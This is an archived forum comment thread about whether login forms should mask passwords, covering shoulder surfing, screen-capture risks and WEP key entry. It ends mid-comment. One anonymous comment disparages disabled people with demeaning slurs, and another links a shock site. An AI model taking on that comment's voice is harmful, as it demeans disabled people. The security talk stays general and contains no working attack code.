	<datestamp>1246188420000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>Just because you don't think someone is watching over your shoulder, doesn't mean someone isn't watching over your shoulder.</p></div><p>Just because you think someone is watching over your shoulder, doesn't mean someone is watching over your shoulder.</p></div>
	</htmltext>
<tokenext>Just because you do n't think someone is watching over your shoulder , does n't mean someone is n't watching over your shoulder.Just because you think someone is watching over your shoulder , does n't mean someone is watching over your shoulder .</tokentext>
<sentencetext>Just because you don't think someone is watching over your shoulder, doesn't mean someone isn't watching over your shoulder.Just because you think someone is watching over your shoulder, doesn't mean someone is watching over your shoulder.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471173</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470967</id>
	<title>But then you might see that their password is</title>
	<author>Dr.Who</author>
	<datestamp>1245963240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>12345</p></htmltext>
<tokenext>12345</tokentext>
<sentencetext>12345</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471503</id>
	<title>How about just an option?</title>
	<author>Touvan</author>
	<datestamp>1245921780000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I personally think that in a lot of places (office, home) I'd love to be able to hit a checkbox and turn that feature off. In other places (Starbucks, college campus), I'd rather have it on.</p><p>I don't see why it has to be so binary. I want it both ways.</p></htmltext>
<tokenext>I personally think that in a lot of places ( office , home ) I 'd love to be able to hit a checkbox and turn that feature off .
In other places ( Starbucks , college campus ) , I 'd rather have it on.I do n't see why it has to be so binary .
I want it both ways .</tokentext>
<sentencetext>I personally think that in a lot of places (office, home) I'd love to be able to hit a checkbox and turn that feature off.
In other places (Starbucks, college campus), I'd rather have it on.I don't see why it has to be so binary.
I want it both ways.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471179</id>
	<title>Re:But then you might see that their password is</title>
	<author>MrEricSir</author>
	<datestamp>1245920760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>How dare you post my password!</p></htmltext>
<tokenext>How dare you post my password !</tokentext>
<sentencetext>How dare you post my password!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470967</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471577</id>
	<title>Insanity</title>
	<author>Anonymous</author>
	<datestamp>1245921960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I do not want my password displayed on my screen. A capable person (or a security device) can already look over my shoulder and record my keystrokes. I do not need the idiot in the cube behind me seeing my password in plain-text. The more difficult it is for a person to guess my password, the better.<br> <br>
Long passwords, such as WPA keys, are a different story, but I have not found one that does not have the option to disable the obfuscation (if the person trying to steal your wireless single/data is already in your house, you have other things to worry about).<br> <br>
If a person cannot remember their password, or cannot remember their last 16 key-presses, then they obviously do not know how to type and should not be working in a field that requires them to log in to a system.</htmltext>
<tokenext>I do not want my password displayed on my screen .
A capable person ( or a security device ) can already look over my shoulder and record my keystrokes .
I do not need the idiot in the cube behind me seeing my password in plain-text .
The more difficult it is for a person to guess my password , the better .
Long passwords , such as WPA keys , are a different story , but I have not found one that does not have the option to disable the obfuscation ( if the person trying to steal your wireless single/data is already in your house , you have other things to worry about ) .
If a person can not remember their password , or can not remember their last 16 key-presses , then they obviously do not know how to type and should not be working in a field that requires them to log in to a system .</tokentext>
<sentencetext>I do not want my password displayed on my screen.
A capable person (or a security device) can already look over my shoulder and record my keystrokes.
I do not need the idiot in the cube behind me seeing my password in plain-text.
The more difficult it is for a person to guess my password, the better.
Long passwords, such as WPA keys, are a different story, but I have not found one that does not have the option to disable the obfuscation (if the person trying to steal your wireless single/data is already in your house, you have other things to worry about).
If a person cannot remember their password, or cannot remember their last 16 key-presses, then they obviously do not know how to type and should not be working in a field that requires them to log in to a system.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</id>
	<title>Indeed lack of imagination</title>
	<author>guruevi</author>
	<datestamp>1245920520000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside. Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.</p><p>2) How many times have you typed in your password while somebody was looking at your screen eg. to show somebody something on a protected website. This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.</p><p>3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg. teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.</p><p>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well. Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights. This is true for Windows, Mac and (depending on your GUI) Linux</p></htmltext>
<tokenext>1 ) If I look outside my office window , I can see about 48 office windows ( without standing up ) and all of them have the lights on and it 's dusk outside .
Give me a dSLR and a decent set of long distance lenses and I 'll prove you wrong.2 ) How many times have you typed in your password while somebody was looking at your screen eg .
to show somebody something on a protected website .
This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.3 ) How many times have you given a presentation where your screen view ( but not your keyboard input ) goes worldwide ( eg .
teleconference ) or over a set of wires that you know have n't been tampered with ( conference room ) - again , logging in to your webmail or so to find a copy of your presentation.4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
Answer : the first can be done in userspace ( and in the hands of an experienced script kiddie would be unnoticed ) , the latter usually has to go as a request to a driver , kernel or other layer that requires admin rights .
This is true for Windows , Mac and ( depending on your GUI ) Linux</tokentext>
<sentencetext>1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside.
Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.2) How many times have you typed in your password while somebody was looking at your screen eg.
to show somebody something on a protected website.
This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg.
teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights.
This is true for Windows, Mac and (depending on your GUI) Linux</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191</id>
	<title>Re:Two words</title>
	<author>geekoid</author>
	<datestamp>1245920760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Shoulder surfing isn't really much of a problem in the work place.<br>When was the last time someone stood close enough to read your password and you didn't know they where there?</p><p>Shoulder surfing is just an excuse to implement a half brained feel good 'security' measure.</p></htmltext>
<tokenext>Shoulder surfing is n't really much of a problem in the work place.When was the last time someone stood close enough to read your password and you did n't know they where there ? Shoulder surfing is just an excuse to implement a half brained feel good 'security ' measure .</tokentext>
<sentencetext>Shoulder surfing isn't really much of a problem in the work place.When was the last time someone stood close enough to read your password and you didn't know they where there?Shoulder surfing is just an excuse to implement a half brained feel good 'security' measure.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475595</id>
	<title>Agree</title>
	<author>kentsin</author>
	<datestamp>1245937980000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The reason is in many occassion, people waiting beside you will watching you type if the password is masked.</p><p>And that mask is effortless, just as the bank telling us to cover the kebpad when entering the password. The clicking sound sold it really well. And a hidden mic would really unnotice.</p><p>If you feel the need, cover the screen with your hand, that also tell people it is unpolite to watch you typing a password.</p></htmltext>
<tokenext>The reason is in many occassion , people waiting beside you will watching you type if the password is masked.And that mask is effortless , just as the bank telling us to cover the kebpad when entering the password .
The clicking sound sold it really well .
And a hidden mic would really unnotice.If you feel the need , cover the screen with your hand , that also tell people it is unpolite to watch you typing a password .</tokentext>
<sentencetext>The reason is in many occassion, people waiting beside you will watching you type if the password is masked.And that mask is effortless, just as the bank telling us to cover the kebpad when entering the password.
The clicking sound sold it really well.
And a hidden mic would really unnotice.If you feel the need, cover the screen with your hand, that also tell people it is unpolite to watch you typing a password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476521</id>
	<title>Re:hunter2</title>
	<author>grahamd0</author>
	<datestamp>1245943980000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p><div class="quote"><p>He's not a security expert, but he IS a useability expert (even though I, a non-expert, often disagree with some of the things he writes).</p></div><p>He's the seventh grade English teacher of usability experts. Everything he says is useful the first time you hear it, but most of it is wrong.</p></div>
	</htmltext>
<tokenext>He 's not a security expert , but he IS a useability expert ( even though I , a non-expert , often disagree with some of the things he writes ) .He 's the seventh grade English teacher of usability experts .
Everything he says is useful the first time you hear it , but most of it is wrong .</tokentext>
<sentencetext>He's not a security expert, but he IS a useability expert (even though I, a non-expert, often disagree with some of the things he writes).He's the seventh grade English teacher of usability experts.
Everything he says is useful the first time you hear it, but most of it is wrong.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471407</id>
	<title>Windows wireless WAP / WEP</title>
	<author>Dan East</author>
	<datestamp>1245921480000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Generally, I think passwords should be represented by asterisks. When I remote access a machine (VNC), or log into a website that takes forever to POST and load the next page, then it certainly is useful.</p><p>However, one place that I think asterisks is really, really stupid is for entering a WPA / WEP key for Windows-managed wireless adapters. In OSX there is a checkbox that allows you to show the key you type. In windows it is DOUBLY stupid. First, entering in a 128 bit WEP key (26 chars) is a tedious error-prone process. So having it visible would be extremely helpful. There are very, very few people that could remember a 26 place hexadecimal number after seeing it only for a couple seconds, so I don't see this as a security risk. But the real stupidity is that Windows makes you enter it twice! Perhaps there is a process in which a WAP can be configured without actually having the WAP in range, but for me, I'm always setting up a connection interactively. Thus if I've entered the wrong key I will know immediately. So I'm really not sure why I have to enter a 26 place hex number, represented by asterisks, TWICE to connect to an AP.</p></htmltext>
<tokenext>Generally , I think passwords should be represented by asterisks .
When I remote access a machine ( VNC ) , or log into a website that takes forever to POST and load the next page , then it certainly is useful.However , one place that I think asterisks is really , really stupid is for entering a WPA / WEP key for Windows-managed wireless adapters .
In OSX there is a checkbox that allows you to show the key you type .
In windows it is DOUBLY stupid .
First , entering in a 128 bit WEP key ( 26 chars ) is a tedious error-prone process .
So having it visible would be extremely helpful .
There are very , very few people that could remember a 26 place hexadecimal number after seeing it only for a couple seconds , so I do n't see this as a security risk .
But the real stupidity is that Windows makes you enter it twice !
Perhaps there is a process in which a WAP can be configured without actually having the WAP in range , but for me , I 'm always setting up a connection interactively .
Thus if I 've entered the wrong key I will know immediately .
So I 'm really not sure why I have to enter a 26 place hex number , represented by asterisks , TWICE to connect to an AP .</tokentext>
<sentencetext>Generally, I think passwords should be represented by asterisks.
When I remote access a machine (VNC), or log into a website that takes forever to POST and load the next page, then it certainly is useful.However, one place that I think asterisks is really, really stupid is for entering a WPA / WEP key for Windows-managed wireless adapters.
In OSX there is a checkbox that allows you to show the key you type.
In windows it is DOUBLY stupid.
First, entering in a 128 bit WEP key (26 chars) is a tedious error-prone process.
So having it visible would be extremely helpful.
There are very, very few people that could remember a 26 place hexadecimal number after seeing it only for a couple seconds, so I don't see this as a security risk.
But the real stupidity is that Windows makes you enter it twice!
Perhaps there is a process in which a WAP can be configured without actually having the WAP in range, but for me, I'm always setting up a connection interactively.
Thus if I've entered the wrong key I will know immediately.
So I'm really not sure why I have to enter a 26 place hex number, represented by asterisks, TWICE to connect to an AP.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471031</id>
	<title>You F\AIL It</title>
	<author>Anonymous</author>
	<datestamp>1245963480000</datestamp>
	<modclass>Offtopic</modclass>
	<modscore>-1</modscore>
	<htmltext><A HREF="http://goat.cx/" title="goat.cx" rel="nofollow">arseholes at Wa7nut</a> [goat.cx]</htmltext>
<tokenext>arseholes at Wa7nut [ goat.cx ]</tokentext>
<sentencetext>arseholes at Wa7nut [goat.cx]</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471363</id>
	<title>Re:Two words</title>
	<author>BigGar'</author>
	<datestamp>1245921300000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>And a really stupid fuel efficiency expert at that, since by your example you'd have distance traveled / fuel consumed = N / 0 = undefined; not infinite.</p></htmltext>
<tokenext>And a really stupid fuel efficiency expert at that , since by your example you 'd have distance traveled / fuel consumed = N / 0 = undefined ; not infinite .</tokentext>
<sentencetext>And a really stupid fuel efficiency expert at that, since by your example you'd have distance traveled / fuel consumed = N / 0 = undefined; not infinite.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474725</id>
	<title>TFA doesn't address screenshot recorders</title>
	<author>LionMage</author>
	<datestamp>1245933720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Yes, keystroke snooping is a great way to obtain passwords, and password masking won't protect against that... but there are situations where a background, headless app will quietly take screenshots at some predefined interval (or when certain trigger events occur) when you're on the system, and any unmasked passwords can easily be captured this way.  Many companies have a policy of recording screen captures of their employees' computers during the work day, and you wouldn't want to trust sensitive password information to a low-level tech monitoring those screen captures for evidence of malfeasance.  Someone who's low-paid enough might be tempted to snag a bank password (many employees bank from work online) or the password to some other sensitive site in order to profit, directly or indirectly.  Or just to have a little hooligan fun at someone else's expense.<br>
<br>
Some folks may be working in such a paranoid environment and may not realize it.  Where I work, this isn't done routinely &mdash; that I know! &mdash; but the capability exists through one of a few packages that are installed by default as part of our core workstation image.</htmltext>
<tokenext>Yes , keystroke snooping is a great way to obtain passwords , and password masking wo n't protect against that... but there are situations where a background , headless app will quietly take screenshots at some predefined interval ( or when certain trigger events occur ) when you 're on the system , and any unmasked passwords can easily be captured this way .
Many companies have a policy of recording screen captures of their employees ' computers during the work day , and you would n't want to trust sensitive password information to a low-level tech monitoring those screen captures for evidence of malfeasance .
Someone who 's low-paid enough might be tempted to snag a bank password ( many employees bank from work online ) or the password to some other sensitive site in order to profit , directly or indirectly .
Or just to have a little hooligan fun at someone else 's expense .
Some folks may be working in such a paranoid environment and may not realize it .
Where I work , this is n't done routinely    that I know !
   but the capability exists through one of a few packages that are installed by default as part of our core workstation image .</tokentext>
<sentencetext>Yes, keystroke snooping is a great way to obtain passwords, and password masking won't protect against that... but there are situations where a background, headless app will quietly take screenshots at some predefined interval (or when certain trigger events occur) when you're on the system, and any unmasked passwords can easily be captured this way.
Many companies have a policy of recording screen captures of their employees' computers during the work day, and you wouldn't want to trust sensitive password information to a low-level tech monitoring those screen captures for evidence of malfeasance.
Someone who's low-paid enough might be tempted to snag a bank password (many employees bank from work online) or the password to some other sensitive site in order to profit, directly or indirectly.
Or just to have a little hooligan fun at someone else's expense.
Some folks may be working in such a paranoid environment and may not realize it.
Where I work, this isn't done routinely — that I know!
— but the capability exists through one of a few packages that are installed by default as part of our core workstation image.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28486235</id>
	<title>Re:People are a problem</title>
	<author>BitZtream</author>
	<datestamp>1246044720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>And this is why you should stick with accepted best practice instead of trying to be cute or clever.</p><p>Do you use a different password on EVERY website you visit?</p><p>You do realize most people have ONE password for the web, that they use EVERYWHERE right?  So while you're little site may not seem like much to you, people do tend to get a little worried when they think someone might be able to see their bank account password, even if they are seeing it on your website.</p><p>Most end users do not have the slightest clue about SSL, most of them have no idea that it exists.  You could setup a site now and most of your users wouldn't give a damn if you were encrypting session as long as you put a little lock icon on your web page and say 'secure' some where they'll be happy.</p><p>Don't try to innovate when you don't understand why its being done in the first place, please.  You clearly do not understand the typical user mindset.</p></htmltext>
<tokenext>And this is why you should stick with accepted best practice instead of trying to be cute or clever.Do you use a different password on EVERY website you visit ? You do realize most people have ONE password for the web , that they use EVERYWHERE right ?
So while you 're little site may not seem like much to you , people do tend to get a little worried when they think someone might be able to see their bank account password , even if they are seeing it on your website.Most end users do not have the slightest clue about SSL , most of them have no idea that it exists .
You could setup a site now and most of your users would n't give a damn if you were encrypting session as long as you put a little lock icon on your web page and say 'secure ' some where they 'll be happy.Do n't try to innovate when you do n't understand why its being done in the first place , please .
You clearly do not understand the typical user mindset .</tokentext>
<sentencetext>And this is why you should stick with accepted best practice instead of trying to be cute or clever.Do you use a different password on EVERY website you visit?You do realize most people have ONE password for the web, that they use EVERYWHERE right?
So while you're little site may not seem like much to you, people do tend to get a little worried when they think someone might be able to see their bank account password, even if they are seeing it on your website.Most end users do not have the slightest clue about SSL, most of them have no idea that it exists.
You could setup a site now and most of your users wouldn't give a damn if you were encrypting session as long as you put a little lock icon on your web page and say 'secure' some where they'll be happy.Don't try to innovate when you don't understand why its being done in the first place, please.
You clearly do not understand the typical user mindset.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471351</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473063</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245927000000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Oh shit. I better uninstall truecrypt guys. My security is "null."</p></htmltext>
<tokenext>Oh shit .
I better uninstall truecrypt guys .
My security is " null .
"</tokentext>
<sentencetext>Oh shit.
I better uninstall truecrypt guys.
My security is "null.
"</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471233</id>
	<title>Re:hunter2</title>
	<author>ucblockhead</author>
	<datestamp>1245920880000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>There are many situations where "over the shoulder" attacks are simply not possible.  For one, it assumes that the person in question is entering the password in a public (or semipublic) place.  For people logging in to sites in their own homes, this sort of attack is exceedingly unlikely.  Now given that password entry failures generally lead to insecure password recovery methods like "secret questions", the current state of things is not good.</p><p>The trouble is that most applications are designed for public computer labs not private homes.</p></htmltext>
<tokenext>There are many situations where " over the shoulder " attacks are simply not possible .
For one , it assumes that the person in question is entering the password in a public ( or semipublic ) place .
For people logging in to sites in their own homes , this sort of attack is exceedingly unlikely .
Now given that password entry failures generally lead to insecure password recovery methods like " secret questions " , the current state of things is not good.The trouble is that most applications are designed for public computer labs not private homes .</tokentext>
<sentencetext>There are many situations where "over the shoulder" attacks are simply not possible.
For one, it assumes that the person in question is entering the password in a public (or semipublic) place.
For people logging in to sites in their own homes, this sort of attack is exceedingly unlikely.
Now given that password entry failures generally lead to insecure password recovery methods like "secret questions", the current state of things is not good.The trouble is that most applications are designed for public computer labs not private homes.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471593</id>
	<title>We need to trim back the ADA</title>
	<author>Anonymous</author>
	<datestamp>1245922020000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>
The Americans with Disabilities Act was supposed to help people in wheelchairs.  Now we have pit bull "assistance dogs" on buses, oinkers complaining they're being discriminated against because they can't get into nightclubs, and easier exams for mental defectives.  This has gotten out of hand.  Parts of the ADA need to be repealed to get it back to its original intent.</p></htmltext>
<tokenext>The Americans with Disabilities Act was supposed to help people in wheelchairs .
Now we have pit bull " assistance dogs " on buses , oinkers complaining they 're being discriminated against because they ca n't get into nightclubs , and easier exams for mental defectives .
This has gotten out of hand .
Parts of the ADA need to be repealed to get it back to its original intent .</tokentext>
<sentencetext>
The Americans with Disabilities Act was supposed to help people in wheelchairs.
Now we have pit bull "assistance dogs" on buses, oinkers complaining they're being discriminated against because they can't get into nightclubs, and easier exams for mental defectives.
This has gotten out of hand.
Parts of the ADA need to be repealed to get it back to its original intent.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471321</id>
	<title>Lotus</title>
	<author>SebaSOFT</author>
	<datestamp>1245921180000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Long live to the Clue Glyphs!<br>Those pretty birds and eyes that represented that our password was typed ok!</p></htmltext>
<tokenext>Long live to the Clue Glyphs ! Those pretty birds and eyes that represented that our password was typed ok !</tokentext>
<sentencetext>Long live to the Clue Glyphs!Those pretty birds and eyes that represented that our password was typed ok!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472513</id>
	<title>Wrong Way of Thinking</title>
	<author>Demonantis</author>
	<datestamp>1245924960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>It would be better if windows didn't disable your account after so many bad guesses and just made you wait a second after each guess. It makes it impossibly long to brute and still is comfortable to use. I think linux already does it.</htmltext>
<tokenext>It would be better if windows did n't disable your account after so many bad guesses and just made you wait a second after each guess .
It makes it impossibly long to brute and still is comfortable to use .
I think linux already does it .</tokentext>
<sentencetext>It would be better if windows didn't disable your account after so many bad guesses and just made you wait a second after each guess.
It makes it impossibly long to brute and still is comfortable to use.
I think linux already does it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471415</id>
	<title>Re:the iPhone does it right...</title>
	<author>Anonymous</author>
	<datestamp>1245921480000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Most phones have been doing this well before the iPhone existed.</p></htmltext>
<tokenext>Most phones have been doing this well before the iPhone existed .</tokentext>
<sentencetext>Most phones have been doing this well before the iPhone existed.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470925</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472041</id>
	<title>Anonymous Coward</title>
	<author>Anonymous</author>
	<datestamp>1245923340000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Mr. Nielsen has obviously never worked in an environment where security is important and in particular where whoever might be looking over your shoulder (or a reflection off something behind you) is uncontrollable.    The zoom lens in a high end cell phone camera can read text from reflection of a screen from 100 feet away, so making sure no one is behind isn't even sufficient.     Higher end cameras can do it from even farther away, even from a building across the street.   It's one of the most common and "usable" methods of scavenging information available to hackers today.</p></htmltext>
<tokenext>Mr. Nielsen has obviously never worked in an environment where security is important and in particular where whoever might be looking over your shoulder ( or a reflection off something behind you ) is uncontrollable .
The zoom lens in a high end cell phone camera can read text from reflection of a screen from 100 feet away , so making sure no one is behind is n't even sufficient .
Higher end cameras can do it from even farther away , even from a building across the street .
It 's one of the most common and " usable " methods of scavenging information available to hackers today .</tokentext>
<sentencetext>Mr. Nielsen has obviously never worked in an environment where security is important and in particular where whoever might be looking over your shoulder (or a reflection off something behind you) is uncontrollable.
The zoom lens in a high end cell phone camera can read text from reflection of a screen from 100 feet away, so making sure no one is behind isn't even sufficient.
Higher end cameras can do it from even farther away, even from a building across the street.
It's one of the most common and "usable" methods of scavenging information available to hackers today.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472431</id>
	<title>Does it have to be either/or?</title>
	<author>Chakolate47</author>
	<datestamp>1245924600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Maybe make an option for dotless login, so that people can use it if they choose.  Accompanied, of course, by adequate (?) warnings about shoulder-surfers and safe environments.  It could be under the accessibility umbrella.</htmltext>
<tokenext>Maybe make an option for dotless login , so that people can use it if they choose .
Accompanied , of course , by adequate ( ?
) warnings about shoulder-surfers and safe environments .
It could be under the accessibility umbrella .</tokentext>
<sentencetext>Maybe make an option for dotless login, so that people can use it if they choose.
Accompanied, of course, by adequate (?
) warnings about shoulder-surfers and safe environments.
It could be under the accessibility umbrella.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475289</id>
	<title>Re:hunter2</title>
	<author>ewanm89</author>
	<datestamp>1245936420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I cover my credit card pin entry, usually with wallet in other hand, then I apply false pressure to a couple of the keys during the entry to limit tampered machine managing to get my pin (I check machine anyway, in UK though shops now have pin entry).</p><p>As for passwords, I'm so use to typing my more secure ones that it would be unlikely for someone to be able to figure pass from hand movements without actually filming it and slowing it down. And I prefer no echo at all, that way even a rough guess at it's length is likely to fail.</p></htmltext>
<tokenext>I cover my credit card pin entry , usually with wallet in other hand , then I apply false pressure to a couple of the keys during the entry to limit tampered machine managing to get my pin ( I check machine anyway , in UK though shops now have pin entry ) .As for passwords , I 'm so use to typing my more secure ones that it would be unlikely for someone to be able to figure pass from hand movements without actually filming it and slowing it down .
And I prefer no echo at all , that way even a rough guess at it 's length is likely to fail .</tokentext>
<sentencetext>I cover my credit card pin entry, usually with wallet in other hand, then I apply false pressure to a couple of the keys during the entry to limit tampered machine managing to get my pin (I check machine anyway, in UK though shops now have pin entry).As for passwords, I'm so use to typing my more secure ones that it would be unlikely for someone to be able to figure pass from hand movements without actually filming it and slowing it down.
And I prefer no echo at all, that way even a rough guess at it's length is likely to fail.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478035</id>
	<title>Re:hunter2</title>
	<author>taucross</author>
	<datestamp>1245956460000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Sharing of passwords is prohibited in my company IT policy. This points towards the real reason of passwords in a corporate environment - confirmation of identity. If I make a change to a system, my company will in all cases assume it was me (for better or worse). <br> <br> A password is more valuable as a political tool than a security tool.</htmltext>
<tokenext>Sharing of passwords is prohibited in my company IT policy .
This points towards the real reason of passwords in a corporate environment - confirmation of identity .
If I make a change to a system , my company will in all cases assume it was me ( for better or worse ) .
A password is more valuable as a political tool than a security tool .</tokentext>
<sentencetext>Sharing of passwords is prohibited in my company IT policy.
This points towards the real reason of passwords in a corporate environment - confirmation of identity.
If I make a change to a system, my company will in all cases assume it was me (for better or worse).
A password is more valuable as a political tool than a security tool.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472693</id>
	<title>Re:Indeed lack of imagination</title>
	<author>BitZtream</author>
	<datestamp>1245925560000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>I can do it for linux and Windows pretty quickly, not sure about OS X, but I can do it on FreeBSD or any X server really.</p><p>All I need is to get you running a process that does my dirty work in Windows, certainly not difficult.  With an X server involved all I need to do is get an app that can connect to your X server and sniffing becomes easy.  Failing that, in both Windows and most unix flavors I can always just futz with your user profile and use LD\_PRELOAD to make sure I see all your stdio.  Don't think its possible?  Have you used screen?  It doesn't preload or anything because its not trying to go unnoticed.</p><p>Its only slightly more difficult to get keyboard characters than it is to get screenshots after you've got to the point where you can do the screeenshots.  Once you get the screenshots, the machine is already compromised to the point that it doesn't matter.</p><p>And on that note, once you compromise the machine to take screenshots, there are far more effective malware packages out there to install than just a screenshot snagger.</p></htmltext>
<tokenext>I can do it for linux and Windows pretty quickly , not sure about OS X , but I can do it on FreeBSD or any X server really.All I need is to get you running a process that does my dirty work in Windows , certainly not difficult .
With an X server involved all I need to do is get an app that can connect to your X server and sniffing becomes easy .
Failing that , in both Windows and most unix flavors I can always just futz with your user profile and use LD \ _PRELOAD to make sure I see all your stdio .
Do n't think its possible ?
Have you used screen ?
It does n't preload or anything because its not trying to go unnoticed.Its only slightly more difficult to get keyboard characters than it is to get screenshots after you 've got to the point where you can do the screeenshots .
